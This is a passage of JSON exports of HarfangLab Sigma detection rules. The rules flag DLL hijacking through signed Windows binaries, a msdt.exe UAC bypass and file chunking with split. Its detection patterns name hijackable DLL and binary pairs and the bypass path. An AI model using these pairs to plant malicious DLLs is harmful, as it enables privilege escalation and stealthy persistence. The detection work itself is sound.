],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "835ab8e3-9576-4a3d-adca-f0b02c4521e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588301Z",
"creation_date": "2026-03-23T11:45:34.588304Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588312Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nlbmgr.yml",
"content": "title: DLL Hijacking via nlbmgr.exe\nid: 835ab8e3-9576-4a3d-adca-f0b02c4521e9\ndescription: |\n Detects potential Windows DLL Hijacking via nlbmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nlbmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\icmp.dll'\n - '\\mfc42u.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "835ab8e3-9576-4a3d-adca-f0b02c4521e9",
"rule_name": "DLL Hijacking via nlbmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nlbmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "835cf66a-988d-4be4-a2aa-a2c5d46be227",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098392Z",
"creation_date": "2026-03-23T11:45:34.098394Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098398Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tokenbrokercookies.yml",
"content": "title: DLL Hijacking via TokenBrokerCookies.exe\nid: 835cf66a-988d-4be4-a2aa-a2c5d46be227\ndescription: |\n Detects potential Windows DLL Hijacking via TokenBrokerCookies.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'TokenBrokerCookies.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wininet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "835cf66a-988d-4be4-a2aa-a2c5d46be227",
"rule_name": "DLL Hijacking via TokenBrokerCookies.exe",
"rule_description": "Detects potential Windows DLL Hijacking via TokenBrokerCookies.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8389372f-409b-490b-b28d-b3a408a9728f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093161Z",
"creation_date": "2026-03-23T11:45:34.093163Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093167Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wfs.yml",
"content": "title: DLL Hijacking via wfs.exe\nid: 8389372f-409b-490b-b28d-b3a408a9728f\ndescription: |\n Detects potential Windows DLL Hijacking via wfs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wfs.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\credui.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n - '\\UxTheme.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowscodecsext.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8389372f-409b-490b-b28d-b3a408a9728f",
"rule_name": "DLL Hijacking via wfs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wfs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "83d1aed7-0c4a-4e42-961d-3ecc74862e5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617555Z",
"creation_date": "2026-03-23T11:45:34.617557Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617561Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1030/"
],
"name": "t1030_split_usage_macos.yml",
"content": "title: File Chunked via Split\nid: 83d1aed7-0c4a-4e42-961d-3ecc74862e5d\ndescription: |\n Detects the execution of the split command.\n Attackers may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds.\n The split command could be used to split a file in multiple pieces to avoid triggering network data transfer threshold alerts.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1030/\ndate: 2022/11/18\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1030\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Collection\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/split'\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "83d1aed7-0c4a-4e42-961d-3ecc74862e5d",
"rule_name": "File Chunked via Split",
"rule_description": "Detects the execution of the split command.\nAttackers may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds.\nThe split command could be used to split a file in multiple pieces to avoid triggering network data transfer threshold alerts.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1030"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84419344-a6ed-4a37-9c60-2f16ddacf2ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602314Z",
"creation_date": "2026-03-23T11:45:34.602318Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602325Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_optionalfeatures.yml",
"content": "title: DLL Hijacking via optionalfeatures.exe\nid: 84419344-a6ed-4a37-9c60-2f16ddacf2ae\ndescription: |\n Detects potential Windows DLL Hijacking via optionalfeatures.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'optionalfeatures.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DUI70.dll'\n - '\\msi.dll'\n - '\\OLEACC.dll'\n - '\\osbaseln.dll'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84419344-a6ed-4a37-9c60-2f16ddacf2ae",
"rule_name": "DLL Hijacking via optionalfeatures.exe",
"rule_description": "Detects potential Windows DLL Hijacking via optionalfeatures.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84500a2e-96cf-41a3-9e82-7c40ea436d83",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093445Z",
"creation_date": "2026-03-23T11:45:34.093447Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093451Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass",
"https://attack.mitre.org/techniques/T1574/002/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1574_002_uac_bypass_msdt.yml",
"content": "title: UAC bypass via msdt.exe\nid: 84500a2e-96cf-41a3-9e82-7c40ea436d83\ndescription: |\n Detects the UAC bypass for the Microsoft Support Diagnostic Tool (msdt.exe) by hijacking BluetoothDiagnosticUtil.dll.\n When the 32-bit version of msdt.exe is launched with the BluetoothDiagnostic package, the binary reopens itself with high privileges.\n Then, the elevated msdt.exe launches sdiagnhost.exe with elevated privileges and a missing DLL from the user directory.\n Attackers can supply this missing DLL (BluetoothDiagnosticUtil.dll) to elevate their privileges on the system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\nreferences:\n - http://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass\n - https://attack.mitre.org/techniques/T1574/002/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2022/02/04\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\WindowsApps\\BluetoothDiagnosticUtil.dll'\n\n filter_signed:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84500a2e-96cf-41a3-9e82-7c40ea436d83",
"rule_name": "UAC bypass via msdt.exe",
"rule_description": "Detects the UAC bypass for the Microsoft Support Diagnostic Tool (msdt.exe) by hijacking BluetoothDiagnosticUtil.dll.\nWhen the 32-bit version of msdt.exe is launched with the BluetoothDiagnostic package, the binary reopens itself with high privileges.\nThen, the elevated msdt.exe launches sdiagnhost.exe with elevated privileges and a missing DLL from the user directory.\nAttackers can supply this missing DLL (BluetoothDiagnosticUtil.dll) to elevate their privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\n",
"rule_creation_date": "2022-02-04",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "848a9f71-06bf-4429-aec7-c38ba26072c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594086Z",
"creation_date": "2026-03-23T11:45:34.594090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594098Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_brdifxapi.yml",
"content": "title: DLL Hijacking via brdifxapi.exe\nid: 848a9f71-06bf-4429-aec7-c38ba26072c9\ndescription: |\n Detects potential Windows DLL Hijacking via brdifxapi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BrDifxapi.exe'\n ImageLoaded|endswith:\n - '\\brlogapi.dll'\n - '\\brlogapi64.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Brother\\'\n - '?:\\Program Files (x86)\\Brother\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Brother\\'\n - '?:\\Program Files (x86)\\Brother\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Dell Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "848a9f71-06bf-4429-aec7-c38ba26072c9",
"rule_name": "DLL Hijacking via brdifxapi.exe",
"rule_description": "Detects potential Windows DLL Hijacking via brdifxapi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84a338af-c81a-4279-b01a-f93486efc9ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591674Z",
"creation_date": "2026-03-23T11:45:34.591677Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591685Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dcdiag.yml",
"content": "title: DLL Hijacking via dcdiag.exe\nid: 84a338af-c81a-4279-b01a-f93486efc9ea\ndescription: |\n Detects potential Windows DLL Hijacking via dcdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dcdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dnsapi.dll'\n - '\\dsparse.dll'\n - '\\dsrole.dll'\n - '\\iphlpapi.dll'\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - 